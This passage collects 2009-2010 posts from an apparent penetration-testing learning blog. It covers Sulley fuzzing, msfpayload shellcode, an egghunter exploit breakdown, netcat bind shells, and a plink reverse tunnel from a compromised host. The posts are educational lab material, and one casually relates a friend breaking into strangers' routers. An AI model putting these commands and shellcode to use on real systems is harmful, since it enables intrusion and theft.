http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2010-03-23 13:04:09 - Yet Another Security Blog : Well it's been in the making for a while Due to certain events and health issues we've had trouble being consistent Good for us, we've been able to work on our pet project A all French language podcast Loosely styled around Pauldotcom security weekly's format, we try to inform and give out bits of information to people We also try to entertain, but remember we are not professionals at this No spoon feeding, you won't learn to hack, penetrate or compromise systems, but you will learn basic information and where to start if you're interested So far, we have 2 episodes available for download on iTunes, or direct links from our site Episode 1 We introduce ourselves, talk a bit about the Sulley Framework Episode 2 Quick talk on Internet Explorer, Snort and Airdrop-ng Here's the RSS feed if you wish Keep in mind we're knew at this, and will try to come out with new episodes once every 3 weeks to a month Also as a reminder, HackUS's CTF is very close so check them out and get registered Hackfestca 2010's Call for paper is also open, so if you're interested or have something to say drop them an email Hope you enjoy the podcast, Have a good one http://www.secuobs.com/revue/news/204424.shtmlhttp://www.secuobs.com/revue/news/204424.shtml Secuobs.com : 2010-03-10 04:47:39 - Yet Another Security Blog - It's been sometime since I've posted something, and I apologize Changed jobs, then the training and getting used to the new people and work environment which is still on going has prevented me from investing time into learning new security relatedstuff Well today I took the time to try out airdrop-ng The new de-authentication tool developed by TheX1le if I'm not mistaken The basic premise behind this python application is pretty simple prevent or allow connections to wireless access points to clients Either by MAC address, vendor name etc Or by the access point's MAC and vendor etc You can prevent 1 specific client to connect to any access point in your area, or allow only that 1 client to connect The possibilities are enormous In a nutshell, you're deciding who can connect, and to what they are connecting Here's the video presentation of airdrop-ng at Schmoocon 2010 - here - Installing airdrop-ng is quite simple as usual I'm using Backtrack 4 I suggest reading the README file root bt apt-get install python-psyco root bt cd pentest wireless root bt pentest wireless svn co http tracaircrack-ngorg svn trunk scripts airdrop-ng root dorktest pentest wireless airdrop-ng python installpy There you have it, it's installed Take the time to read the README file and examples and explanations found in the docs folder Using airdrop-ng is pretty easy so far For now I can only test it using 1 wireless card second is one the way It works with the single card, but I can see why it would better with 2 Using only 1 card, you kinda need to be specific in your rules file For example, d ANYANY won't work as well as d ANYApple Since you need airodump-ng running the whole time airdrop-ng is They seem to be battling each other for use of the card Running the d ANYANY with one card will generate lots of errors So d AP MAC ADDY ANY works also, but won't completely deny access to the access point As far as my tests here, my laptop would lose 50pourcents of it's pings Although my laptop was still connected to the router, Internet access was pretty darn slow Guess that's all for my findings on airdrop-ng so far Once I get my second wireless adapter, I'll be in a better position to experiment and report on it's usage TheX1le's application is very nice, easy to use and understand Besides a few typos in the documentation, it's an easy read and something I suggest you do I'll try and whip up a video of it in action in the next few weeks Thanks for reading, and remember to visit us at kioptrixcom http://www.secuobs.com/revue/news/200105.shtmlhttp://www.secuobs.com/revue/news/200105.shtml Secuobs.com : 2010-02-21 21:13:39 - Yet Another Security Blog - The Sulley Framework is a great fuzzing tool One of the best out there in my opinion Unfortunately, as far as I can tell anyway, development has stopped Meaning nothing new to the framework For last few months, I've been doing my best to learn this framework Let me tell you, it hasn't been always easy Not much information out there besides a few basic tutorials Something else that is missing are request files The request file is, in sense, what makes fuzzing an application possible There are a few files that come stock with Sulley, but not many So I'm gonna try and re-mediate the situation by posting sharing request files I've been able to find and or create with the help of a few friends Sulley Request Files The Sulley Framework Request File Repository My hopes in time is to build a nice collection of files so people trying to learn and use Sulley can have a starting point I also hope that veterans of the framework will be nice enough to contribute, point out mistakes and send in their own request files they've crafted over time The site is pretty new, and I'm not web designer I'll do my best to update the file list when new ones are created, or sent in So I call out to everyone that has experience with this framework, and to help out the new guys Thank you, loneferret wwwkioptrixcom http://www.secuobs.com/revue/news/193960.shtmlhttp://www.secuobs.com/revue/news/193960.shtml Secuobs.com : 2010-02-14 17:34:32 - Yet Another Security Blog - I while ago, when I was doing the OSCP course I learned about shellcodes and exploits During this time, usage of Metasploit's online shellcode generator was really useful When it came down to exam time, well the site was down No more automated tool, and this during my 24 hour exam What did I do A little google search and presto found how to correctly use msfpayload msfencode All was well Since then, I've gone back to using the online tool Bad idea I say this because recently, I've had to generate some shellcode for an exploit Of course the automated online tool was down This forced me once again to re-learn the command line tool This made me realize two things 1 We rely way too much on automated tools 2 Laziness kicks in so very fast I mean, it isn't that hard to use, and remember Just need to type it a few times to get the syntax burned into that gray matter of ours msfpayload windows exec cmd calcexe R msfencode -b ' x00 x0a x2f x5c' -e x86 shikata_ga_nai -t c Here's an example of using both msfpayload and msfencode The payload is windows exec, the CMD is calcexe and we output the raw code We pipe that into msfencode The -b is the list of bad characters the -e is the encoder this case shikata ga nai and we output to C format using the -t switch There are plenty of online resources that can show you how to use it This is true for every automated tool we are used to use Bottom line, if it's command line and there's an automated tool learn the command line first You never know when that automated one will be pulled off the air http://www.secuobs.com/revue/news/191794.shtmlhttp://www.secuobs.com/revue/news/191794.shtml Secuobs.com : 2010-02-06 05:43:13 - Yet Another Security Blog - In my previous entry on the Sulley Framework, we took a look at a simple request and session file to fuzz a FTP server This time we'll look at what we need to have and do to fuzz a TFTP server The big difference is one uses the TCP protocol and the other UDP By default Sulley will connect to TCP ports We need to specify that we are trying to fuzz UDP This is specified in our session file from sulley import import everything from Sulley from requests import tftp sess sessionssession session_filename audits tftpserversession ,proto udp Target IP xxxxxxxxxxxx target sessionstarget xxxxxxxxxxxx , targetnetmon pedrpcclient xxxxxxxxxxxx , 26001 targetprocmon pedrpcclient xxxxxxxxxxxx , 26002 targetprocmon_options proc_name sessadd_target target sessconnect s_get tftp sessfuzz Once you've specified the proto parameter, the rest of the session file is pretty much the same as fuzzing any other protocol Now that you have you session file configured for UDP connections, you'll need a request file I found this basic file TFTP request file on the Internet here Now that we have our session and request file There's one more change that needs to be done before we can appreciate all of this When fuzzing a TCP protocol, you would run the network_monitor script like so c sulleypython network_monitorpy -d X -f src or dst port XX -P path Well since this is UDP and the traffic is only one way, the pcap string won't capture anything So you'll need to enter it this way c sulleypython network_monitorpy -d X -f udp dst port XX -P path As with anything script related, this can be improved So know you can pretty much follow my previous blog post on Sully or view the video on kioptrixcom and start fuzzing UDP Try downloading a known vulnerable TFTP server and watch it fuzz Here's a nice little list from exploit-db that you can have fun with As always, I'll try and get a video up demonstrating this Always fun to make those, and perhaps I'll actually put the Benny Hill theme song or just sound One day perhaps Thanks again, hope you enjoyed this little read and remember to visit us at wwwkioptrixcom http://www.secuobs.com/revue/news/189224.shtmlhttp://www.secuobs.com/revue/news/189224.shtml Secuobs.com : 2010-01-30 22:56:03 - Yet Another Security Blog - Been pretty busy these past few weeks, and finding the time to post stuff up is getting difficult But I do bring something fun to watch If you administer users, you should have a look at this video Java Signed Applet If you want a little more information on how to test this exploit in a controlled environment Head over to pauldotcom The screencast is a little more complete then mine I just wanted to prove a point Hope you enjoy it http://www.secuobs.com/revue/news/187000.shtmlhttp://www.secuobs.com/revue/news/187000.shtml Secuobs.com : 2010-01-20 03:15:59 - Yet Another Security Blog - With recent attacks on Google Adobe and Yahoo just to name a few thanks to the Aurora exploit Internet Explorer is something to be avoided at the moment Unless you're running version 501, I would suggest switching to FireFox for the time being As far as I know, Microsoft has not released a patch for this one Let's hope they do As far as I can tell, and with a little info from exploit-db, remote code execution is only functional under Windows XP running Internet Explorer 6 That doesn't mean newer versions of Internet Explorer are not effected we just don't know about it yet IE 7 8 will crash under Windows XP, and the DEP under Vista 7 should stop the crash in time So it's a good idea to listen to Microsoft and enable DEP and everything else under the sun to protect your system s Especially now there's another exploit that basically guarantees privilege escalation The Ring-0 exploit Is the latest one, and let me tell you I've tested this privilege escalation exploit on Windows XP sp2 xp3, Windows Server 2008 Enterprise and Windows 7 Dookie from exploit-db tested it on Windows Server 2003 We all got System shell Not scared yet You should be You can read more about it in the link I provided just above Does this mean Windows is wide open at the moment Should we close down the Internet and our corporate networks Well even if that would be a great solution, it's impossible There is one way to protect one's self or help reduce the risk damage DON'T RELY ON JUST A FIREWALL Let your network administrators install snort Let them monitor inbound as well as outbound traffic Don't close your eyes and say there's no reason to get hacked we're a small company of course this is more for any managers reading this Like to meet the guy that said Linux is less secure now So good luck this week, and lets hope Microsoft comes up with something soon I need to scare the pants off my boss tomorrow Need to work on a nice scenario to really convince him Again, good luck All of you http://www.secuobs.com/revue/news/183359.shtmlhttp://www.secuobs.com/revue/news/183359.shtml Secuobs.com : 2009-12-28 00:05:26 - Yet Another Security Blog - Ref Gray Hat Python The framework is coded entirely from Python and is open source Developed by Pedram Amini and Aaron Portmoy from Tipping Point, Sulley is a fuzzer packed with interesting capabilities Such as packet-capturing, crash reporting and VMware automation It also has the capability to restart the target application in the event of a crash Then continues on with the fuzzing process For data generation, Sulley uses a block-based fuzzing, the same method used as Dave Aitel's SPIKE So if you're familiar with SPIKE, you shouldn't have much trouble with this fuzzer In block based fuzzing, you build up a general skeleton for the protocol or file you are fuzzing There's going to be an example later in this post One great feature this fuzzer has over others, is the ability to show the CPU's registers at the moment of the crash Sulley comes with PyDBG, and once the framework installed it uses this to monitor the process you are fuzzing Another one is Sulley's ability to monitor the network using pcapy , capturing every fuzz sent to the target Creating one pcap file for each attempt This way you can follow your progress, or review your fuzzing session Lastly, you can even see the fuzzing progress via an HTML page The page shows you which variable it's currently fuzzing and it's progress Sulley Primitives Strings Sulley uses the s_strings directive to denote that the data contained is a fuzzable string So we wantd to fuzz an email address, we'd declare it like this in our skeleton s_string fuzzing sulleycom This tells Sulley it's a valid value, so it will fuzz that string and exhaust all reasonable possibilities Once it's finished, it will revert to it's original value and continue fuzzing the rest of the declared values down the file Delemiters This is just a small string that helps break up larger ones If we take our email example from above, the delimiter would be the sign This is how we'd passe this primitive on to Sulley s_string fuzzing s_delim s_string sulley s_delim s_string com Like the s_string primitive, the delimiter is also fuzzed In this example, odds are the is a value we really don't need to so we can tell Sulley to not fuzz it like so s_delim , fuzzable false Static The values passed to a static string, remind unchanged or un-fuzzed I suppose s_static r n So let's take a look at a complete, yet small and simple, skeleton file In this example, we'll look at the FTP protocol import all of Sulley's functionality We'll call this file ftp_abilitypy from sulley import s_initialize user s_static USER s_delim , fuzzable false s_static ftp s_static r n s_initialize pass s_static PASS s_delim , fuzzable false s_static ftp s_static r n s_initialize stor s_static STOR s_delim , fuzzable false s_string AAAA s_static r n You can see, it's pretty simple This file basically feeds Sulley with starting values and it takes it from there Fuzzing the fields you denoted as fuzzable In this case the username, password and the STOR command Depending on the target FTP server, you'll add and or remove commands Not every FTP server will have STOR , and not all of them have LIST So this is where you'd supply a valid list of commands Now that we've seen our blocks, lets take a look at the session file The file that starts the whole fuzzable process from sulley import import everything from Sulley from requests import ftp_ability this is our ftp_abilitypy file from requests folder def receive_ftp_banner sock sockrecv 1024 sess sessionssession session_filename audits abilitysession target sessionstarget xxxxxxxxxxxx , 21 Target IP xxxxxxxxxxxx targetnetmon pedrpcclient xxxxxxxxxxxx , 26001 Target IP xxxxxxxxxxxx targetprocmon pedrpcclient xxxxxxxxxxxx , 26002 Target IP xxxxxxxxxxxx targetprocmon_options proc_name Ability Serverexe sesspre_send receive_ftp_banner grab the banner sessadd_target target sessconnect s_get user Notice our commands from the previous file sessconnect s_get user ,s_get pass This tells Sulley user must be authenticated to use this command sessconnect s_get pass ,s_get stor sessfuzz Because most FTP servers send a banner, we tell Sulley to wait for it before fuzzing any data The next thing, is the session file which keeps track of our overall session This allows us to stop and restart our fuzzing where we had previously left off After that we define our target with the appropriate IP and port number In this case, a FTP server After defining the target, we tell our network sniffer to set itself up on the same host and listening on 26001 Last we tell our debugger is listening on the same host and that is listening on 26002 We chain in the authentication commands and tell Sulley to start fuzzing To start the fuzzing process, we need to have Sulley installed on 2 machines I find it less confusing this way The attacking and victim machines From the target machine 1 start the process we want to fuzz this case Ability Server 2 attach the process monitor to our server C sulleypython process_monitorpy -c c abilitycrash -p Ability Serverexe 3 attach the network monitor to our network card and have it sniff for specific traffic The -P parameter is to store your pcaps file You must create this folder first You can use a mapped drive too C sulleypython network_monitorpy -d 1 -f src or dst port 21 -P z From our attacking machine 1 execute the session file from Sulley's root directory C sulleypython ftp_session_abilitypy Once the process has started, you can point your browser to the attacking machine's IP on port 26000 to get a progress report You need to manually refresh the page Once the application crashes, you'll be able to see the crash report on the page Enabling you to see what where was overwritten in the CPU's registry You can get the install executable here And the PDF here I'll be posting a video on kioptixcom to demonstrate all of this Using the same files and vulnerable application mentioned above Thanks to dookie for pointing out a few mistakes of mine while I was setting up Sulley for the first time Also the Gray Hat Python book that gave me a good push with this Next week, fuzzing the wife to get wait wrong blog http://www.secuobs.com/revue/news/176038.shtmlhttp://www.secuobs.com/revue/news/176038.shtml Secuobs.com : 2009-12-20 04:09:59 - Yet Another Security Blog - I just needed to type this somewhere so I don't forget Maybe by putting it here, it will be of some use to others A CPU uses 8 general purpose registers EAX, EDX, ECX, ESI, EDI, EBP, ESP and EBX Each register is design for a particular purpose, and each performs a function that enables the CPU to efficiently process information The EAX register, is used to perform calculations as well as storing return values from function calls Basic operations ilke add, subtract, and compare are optimized to use the EAX register More specialized operations like multiplication and dvision can occur only within the EAX register The EDX is the data register It's basically an extension of EAX to assist it in storing extra data for complex operations It can also be used for general purpose data storage The ECX, also called the count register, is used for looping operations The repeated operations could be storing a string or counting numbers The ESI and EDI relied upon by loops that process data The ESI register is the source index for data operation and holds the location of the input data stream The EDI points to the location where the result of data operation is stored, or the destination index ESP is the stack pointer, and EBP is the base pointer These registers are used for managing function calls and stack operations When a function is called, the function's arguments are pushed on the stack and are followed by a return address The ESP register points to the very top of the stack, so it will point to the return address EBP is used to point to the bottom of the call stack EBX is the only register that was not designed for anything specific It can be used for extra storage EIP is the register that points to the current instruction being executed As the CPU moves through the binary executing code, EIP is updated to reflect the location where the execution is occuring http://www.secuobs.com/revue/news/174341.shtmlhttp://www.secuobs.com/revue/news/174341.shtml Secuobs.com : 2009-12-11 23:03:43 - Yet Another Security Blog - Buffer overflows can be a daunting part of exploitation, almost esoteric in nature if you don't have an idea of what's going on in the back ground A little while ago I posted an exercise for Easy Chat Server with a proof of concept If you successfully accomplished the task, you may like this little entry Egghunters An egghunter is a bit of code that, once executed, will search the memory for a specific string called the egg Once it's found the egg, your shellcode is then executed Well so far it doesn't seem to complicated does it So why would you want this solution to exploit a buffer overflow vulnerability Well, once you've overwritten EIP and jump to your buffer where the shellcode would go What would happen if you only had about 50 bytes of usable space This would be a nice example of when an egghunter would be used The egghunter itself is about 32 bytes, the egg is 4 bytes times 2 and then you have your shellcode When you send your evil buffer , the egghunter is placed in the part of memory you overwrite The shellcode is stuffed somewhere else, its location unknown to us Once EIP is pointed to your buffer space, the hunter is executed and then searches the memory for your shellcode To put it roughly, it would look like this offset egghunter egg shellcode As long as the egghunter fits the buffer space EIP is sending you, you're in business Here's a nice example of code using the egghunter method It was coded by Dr_IDE an OSCP graduate and dookie2000ca star quarter-back for the Edmonton Roughriders back in '86 It's well coded and very easy to read Eureka Mail BoF SEH So let's try and break down the above exploit shall we First we have the egghunter Notice the commented part This is the egg w00t egghunter x66 x81 xCA xFF x0F x42 x52 x6A x02 x58 xCD x2E x3C x05 x5A x74 xEF xB8 x77 x30 x30 x74 this is the egg w00t x8B xFA xAF x75 xEA xAF x75 xE7 xFF xE7 The hunter is setup to look for the string w00t in memory It loops though and compares the value to x77 x30 x30 x74 It will loop until it finds the egg, break out of the loop and execute the shellcode found directly after it The next few parts of the file is pretty standard stuff Return address, short jumps and nop slide Won't go into that, but let me direct your attention to the last part Where the buffer is built sploit -ERR buff retn egghunter nops junk w00tw00t bindshell As you can see, we have our egg there The hunter will look for 2 instances of the string w00t in a row, and execute the code following it There is one down side to using the egghunter method It's CPU intensive Once the egghunter is execute it will go through the roof, and reach 100pourcents On the other hand, you'll be able to send almost any sized payload Here's a very interesting video showing an egghunter It's from Offensive-Security's video vault HP NNM from Bug to 0day I'll try and post a video on kioptixcom showing the egghunter in action The above video is very clear in explaining, but the video quality can be lacking at times but not very http://www.secuobs.com/revue/news/171186.shtmlhttp://www.secuobs.com/revue/news/171186.shtml Secuobs.com : 2009-12-08 15:18:24 - Yet Another Security Blog - HackUS First Edition, is a capture the flag event being held in Sherbrooke Quebec in April of 2010 The event will last a full 48 hours which is guaranteed to keep you from actually doing any sleep More details can be found on there website HackUS Also, here are a few of the prizes made available thanks to Offensive-Security's generosity PWB w 60 day lab access CTP w 60 day lab access Now that's what I called an incentive to participate Registration is only 110 CAD and includes meals and accommodations, with transportation from the hotel to the event site It's 50 CAD if you don't want a hotel room or plan on not sleeping I had the pleasure of e-mailing one of the organizers Must say, very nice and he's obviously into Information Security The Sherbrooke team came in second place at the Hackfestca CTF event this past November Just one point shy of the UQAM team I'm sure you guys will get your revenge in April So if any of you are near the Quebec boarder, I highly recommend this Check out their site and hope to see you there I'll be participating, but will only send in my registration fees after Christmas bills bills bills http://www.secuobs.com/revue/news/169706.shtmlhttp://www.secuobs.com/revue/news/169706.shtml Secuobs.com : 2009-12-05 18:21:45 - Yet Another Security Blog - I recently completed 2 security related certifications The first is Offensive-security's OSCP Pentesting With Backtrack and the other is Heorot's PTF Pentesting Fundamentals Here is where you can find more information on both certifications Pentesting Fundamentals Heorot OSCP Offsec The point of this blog is not to bash or flame one certification Both are challenging and interesting in their own way It's just that, depending on how you look at it, one is more advanced then the other Seeing that difficulty is very relative to each individual person, if I refer one as being more difficult keep in mind it's my opinion Let's start off by describing each training course, let's talk about Heorot's PTF Once a student starts the course, he receives an e-mail with links and access codes to the online training material This is comprised of videos, slides and documents Also, 2 live CD images are needed for the course The first CD is the first De-ICE live CD used during the course itself The second is the vulnerable system which is your target to complete the course You get to run a mock pentest on this system following the methodology based on the ISSAF learned in the course Once you've finished, you write up your report as explained in the ISSAF and send it on it's way for review grading Offensive-Security's PWB takes a different approach Once the course starts classes start on a saturday , the student gets an e-mail with access to the course material video and PDF and access to an online lab Through out the course, the student gets to follow the teacher and practice on live hosts in secure and legal environment Students get the chance to run scans, exploits and other techniques on various operating systems Once all the exercises completed, an exam is scheduled Upon completion of the exam, the fail or pass e-mail is sent within 72 hours So in a nutshell, they are both courses that teach you about penetration testing One is more documentation methodology driven, and the other has a more hands on approach So which is better Which one should you take Which one should you take first Which one is harder easier Which one is worth it Well The answer to all those questions really depend on one's personal skill level and experience When I started OSCP, I had no prior experience with exploits metasploit and other info-sec related activities I did however have a pretty good knowledge of the Linux operating system, networking and programming Even with all that, I found the course extremely challenging if not out of my league at times Still with some effort and research, I still managed to pass the 24 hour exam and receive my certification After doing all that, I waited a few months and tried my hand with Heorot's fundamentals course Being a fundamentals course, and documentation methodology driven, the penetration and exploitation of the target system was easy in comparison to OSCP The goal in PTF is not to see if you can pop a box , but properly produce a penetration report following certain guidelines As you can see, depending on what you already know or don't know both certifications can have a strong learning curve For me, well PTF was a bit of a disappointment seeing the cost and time it's taking to grade my report as of today it's been over a week and still no news So for the cost, in my opinion, if you already have experience with vulnerability scanners, frameworks such as Metasploit w3af etc, go for OSCP Once you've done that, nothing stops you from downloading the ISSAF methodology documentation free from their website If you don't have any prior experience, then PTF would be a good place to start You get to learn the basic tools, such as nmap hydra, and properly conduct a pentest from A to Z The answers to all my previous questions above all comes down to this It depends on you Thanks for reading http://www.secuobs.com/revue/news/169020.shtmlhttp://www.secuobs.com/revue/news/169020.shtml Secuobs.com : 2009-12-02 14:48:53 - Yet Another Security Blog - An interesting article on VPN attacks that bypass browser security My colleague sent this link, pretty good read US-CERT Wars Of VPN Attack Interesting site lets you search specific countries and open ports Try it out for yourself, it's not perfect but pretty cool ie port 22 country ca SHODAN ------ A SANS article --Microsoft Looking Into Black Screen Problem November 30, 2009 Microsoft is investigating reports that security updates it released in November are causing black screens on some users' computers The updates allegedly change Access Control List SCL entries in the registry The problem appears to affect computers running Windows 7, Vista and XP Related articles TechWorld CNet ------ Backtrack 4 is up to kernel 26307 If you have a problem with PostgresSQL 83 on boot up after a dist-upgrade Here's a fix that worked me Just edit the postgresqlconf file found etc postgresql 83 main and set ssl to false If you do need ssl if you here's a link to fix that as well link Also if you update upgrade everything, you may end up with one package that won't upgrade for some reason This has been mentioned in the Remote-Exploit forum, but has yet to be addressed as far as I can tell Package Backtrack-sniffers apt-get upgrade Reading package lists Done Building dependency tree Reading state information Done The following packages have been kept back backtrack-sniffers 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded ------ I guess by now, everyone knows that Metasploit now has colour Have to admit, it does look good Also the colour seems to help me out There's also an interesting article recently written about Rapid7's NeXpose Community Edition A free version of their commercial software with Metasploit integrated into it Penetration Testing in the Marketplace 2010 and Rapid7 Releases Free version of Nexpose ------ Well don't have much time to try out anything really security related these days So I'll try and pass on information I fall on for the next few weeks Remember to visit us on our website Kioptrixcom The site ain't finished but should be up and running by the end of December So in the mean time, download the VMs tells us what you think If you have built a few vulnerable VMs images yourself, place comment here and we'll do our best to host them Have a good one http://www.secuobs.com/revue/news/167813.shtmlhttp://www.secuobs.com/revue/news/167813.shtml Secuobs.com : 2009-11-30 14:01:46 - Yet Another Security Blog - My blog will have a new permanent home soon A friend and I have setup a small website, and I'll be moving this blog there Going to be fun, I'll be able to post screen-shots and better serve the public with my small IT tutorials and everyday sysadmin rants At the moment the site is not 100pourcents complete It does have many links to tools, videos, articles and RSS feeds we find interesting We also have 2 vulnerable VM images one can practice scans and penetration methods We hope people will enjoy it The site's purpose is gather as much information relating to IT security and place it in one neat little package We are fully aware of the fact that many sites like this exists, but one more won't hurt If it can help one or two people find an interesting fact on security I'll be happy The website will be re-written in French so as to better serve the people in my region and perhaps even a pod-cast French We don't pretend to be the best in this field, but we are 2 guys willing to learn and share So to everyone who actually reads my blog yes all 2 of you , thanks hope you visit the site Kioptrix http://www.secuobs.com/revue/news/166742.shtmlhttp://www.secuobs.com/revue/news/166742.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, after years of reading on other people's blogs After weeks of debating if I should start one of my own, and wondering what would I write about I finally figured out a subject Computers, network security and other related subjects Now, I'm no expert Not a profession security consultant, nor am I a security analyst I'm a system administrator, presently learning the ins and outs of security Figured I'd use a blog as a reference I'll post links to articles related to computer networking and network security, and maybe type up some of my own learning experience during my journey into this strange difficult and mythical subject known a Penetration Testing A little about myself I suppose Been in IT for a few years now, and like many I've had a computer since I was a kid back in the 8086 days Got a few certifications such as MCDST, Comptia Linux , Network , i-Net and for some reason I have a CIW certificationdon't ask Presently working on Offensive Security 101 now known as Pentesting with Backtrack , so I'm looking forward to eventually getting the Offensive Security Certified Professional, or OSCP So odds are, I'll mostly be posting my experiences along the course, without going against the course's copyright Let me tell you, this one is hard http://www.secuobs.com/revue/news/166610.shtmlhttp://www.secuobs.com/revue/news/166610.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Netcat is a powerful tool that everyone should learn to use I've only been aware of this tool for about a month now, and already I'm finding way to use it or situations where it could be useful at work Netcat is able to connect read write to any port using TCP or UDP protocols One can send and receive files, scan ports and you can even redirect standard input output errors with netcat It's also possible to use netcat for port redirection Here are few interesting articles about Netcat GIAC Wikipedia --------------------------------------------------------------------- Here are few simple examples of the netcat syntax Let's look at transferring a text file from a Windows machine to a Linux machine Of course, we'll assume the Windows system has a copy of netcat First the Linux machine, receiving the file, needs to setup a listener linux nc -lvp 4444 outputtxt Any traffic directed to port 4444 will be directed into the outputtxt file Second, the Windows system will open a connection and send the text file C nc -nv -Linux IP here- 4444 The contents of testtxt will be piped into port 4444, and sent to our listening Linux machine Now netcat doesn't have any progress bar to show when the transfer is completed, so you need to guess and kill the connection manually using the CTRL-C key combination --------------------------------------------------------------------- Banner grabbing with netcat is pretty simple All one needs to do is connect to the specified IP address and port Once connected, depending on the port one used, commands can be issued to gather more information Of course, all services will give out banners, and systems administrators can always remove the banner Let's look at how one can retrieve an SMTP banner linux nc -nv -IP address- 25 Sometimes, but not always, the SMTP server will give out information such as Sendmail 8131 8131 One can also type in commands once connected to verify the existence of users --------------------------------------------------------------------- Another fun thing one can do with netcat, is command redirection Using the -e switch, you can redirect standard input, output and error to a specific port So we can essentially send a command shell via netcat so let's do this Imagine 2 users on a the same network, John and Cindy John needs Cindy's assistance on his computer and wishes to send her a command shell over the network to her computer So let's start by starting netcat on a particular port, and bind redirect our command shell to it From John's computer C nc -lvn 4444 -e cmdexe This will basically redirect all input output errors from cmdexe to port 4444 From Cindy's computer Now that John's netcat is waiting for a connection, all that Cindy needs to do is connect to John's computer on port 4444 and she should receive the command prompt linux nc -nv -John's ip here- 4444 This is called a bind shell Try it and see http://www.secuobs.com/revue/news/166609.shtmlhttp://www.secuobs.com/revue/news/166609.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - The SNMP is a management protocol often used to monitor and remotly configures servers and other network devices such as switches, router etc This protocol has a weak authentication system public and private community strings Public community string can read information from a SNMP enabled device Private community string can often reconfigure a device Wikipedia has a nice article about this, also the mib tree where you can find here --------------------------------------------------------------------- Scanning machines with snmp enabled can give interesting results if improperly configured Many tools exist, but the one I was exposed to during my Offensive Security course was snmpwalk Scanning a Windows system running snmp From our linux machine's shell, we'd would type the following command to scan a single machine linux snmpwalk -c public -v1 -target IP- This can return information such as running services, and or installed applications Also somewhere in the output, we could find the operating system's version It can be a very long output, so using grep is a good idea linux snmpwalk -c public -v1 -target IP- grep sysDescr0 One can also enumerate users with snmpwalk linux snmpwalk -c public -v1 -target IP- 1 grep 771225 cut -d -f4 Enumerating services with snmpwalk linux snmpwalk -c public -v1 -target IP- 1 grep hrSWRunName cut -d -f4 Enumerating TCP ports linux snmpwalk -c public -v1 -target IP- 1 grep tcpConnState cut -d -f4 And enumerating installed applications linux snmpwalk -c public -v1 -target IP- 1 grep hrSWInstalledName cut -d -f4 The above syntax, the switches -c -v are used The first -c is to indicate which community string public or private The second, -v tells the script which version of snmp to use In this case version 1 We also inform the script to add the root of the mib tree with 1 after the target's IP address See top of the this post for a wiki link on the mib tree Of course, one can use the following script snmpcheck to gather most or all information availible in a more human readable format http://www.secuobs.com/revue/news/166608.shtmlhttp://www.secuobs.com/revue/news/166608.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - When connecting to port 995 e-mail SSL accepted server using a raw TCP connection, nothing will happen since it's expecting SSL commands So we could type anything we want after the connection is made, and nothing will happen What we need to do is, encapsulate our traffic in SSL This can be done using stunnel Visit the author's site, and have a look around If it's not installed on your Linux distribution then I recommend doing so There's also a Windows version as well which I also suggest getting if you want to test out creating a netcat session between 2 machines using an stunnel Let's see how we can go about creating a simple chat session between 2 machines with netcat and stunnel First let's setup our listening machine to accept SSL connections on a specified port Lets start by configuring our client machine to accept traffic on a given port, take that traffic and encapsulate it SSL and sent to socket accepting SSL connections First open up stunnel's config file I'm my Linux machine as client and add modify the following stunnelconf client yes netcat client accept 5555 connect -Listening IP- 4444 Any traffic entering port 5555 will be encapsulated and sent to port 5555 on the target IP as SSL traffic Now let's setup the stunnel service on our listening machine, in this case the Windows system stunnelcong client no netcat server accept 4444 connect 7777 So now that we have stunnel setup on both machines, let's start the connection using netcat From our listening system, or serve C nc -vlp 7777 And now, let's connect from our Linux system Linux nc -nv 127001 5555 If everything went according to plan, the Linux box connects to local port 5555 which is then encapsulated and sent to the listening's IP address which is expecting an SSL conneciton One should be able now to chat between the two systems One can also receive a reverse shell this way, or connect to a pop3 mail server which only accepts SSL connections on the default port 995 http://www.secuobs.com/revue/news/166607.shtmlhttp://www.secuobs.com/revue/news/166607.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - An SSH tunnel encrypts traffic and access non-routable machines in a secure way Here's a nice wiki explaining the subject in more depth -here- So let's imagine you've managed to receive a reserve shell from your target Windows machine Once at the command prompt, you noticed other local ports open that were not available to you during your initial attack How you got your reserve shell is not important Looking over the ports, you see port 3389 open on the system of course other ports may be more interesting but that would be better explained with Metasploit The exercise here is, how to gain access to this non routed port to your machine that is outside the network The answer is a tunnel, and in our case an SSH tunnel First you'll need an SSH server on your system the attacker , an SSH client on your target This example assumes that outgoing traffic isn't limited or monitored Remember this is just a simple exercise that can be easily accomplished at home on your local network Let's start by getting a simple ssh client to our windows machines There are many ways one can do this, I prefer using TFTP for 2 reasons Firstly Windows usually comes with a TFTP client and Backtrack has a nifty TFTP server readily available note one must always verify and see upload download options So let's start by uploading our ssh client plinkexe C TFTP -i -your IP here- GET plinkexe There's no progress bar, so you'll just have to wait for your prompt to come back once the upload is finished Now that you have your client, lets start our ssh connection Make sure you have your listener setup C plink -P 22 -l root -pw root -C -R 3389 127001 3389 -your IP here- Real quick, the -C puts compression on the connection and the -R remotely fowards it to the local machine The user and password should be set to your own on the ssh server If all went well you'll be back to your Linux prompt Check to see what ports are now listening on your local machine, and you should see 3389 now Start up rdesktop and point it to 127001 on port 3389 and you'll be rewarded with a nice remote desktopOne could use this method on other ports for other means As mentioned above, you can remotely forward other ports and run other applications Imagine forwarding port 139 to your local machine Please remember to do this on your local network, as this implies that you port scanned your victim machine Port scanning is considered illegal in certain parts of the world http://www.secuobs.com/revue/news/166606.shtmlhttp://www.secuobs.com/revue/news/166606.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Nothing really technical today, just an opinion on a popular ISP in my area Bell Sympatico When one subscribes, they are offered the choice to receive a wireless router As an added bonus for people that may not be able to configure the device It either comes pre-configured, or a technician can swing by and set it up for you That's about the only good thing about the service As Bob mentioned to me not long ago, he found a few security issues that alarmed me For starters, the router is configured by default with WEP which can be easily cracked using air-crack The default WEP key is actually the router's serial number Lastly, and this is what made me jump, there is no username password on the router by default As Bob was telling me, he managed to crack a few WEP keys and enter these secure routers provided by one of the biggest ISPs in Canada The router has many options, such as opening and closing ports Redirecting traffic just to name a few The worst part, it never asks for a password when saving these new settings Another thing that surprised me is that this router also acts as the client's modem So along with all the local network's information found on the device, you can also retrieve the username and password to the customer's internet connection I know for a fact, that often clients with no 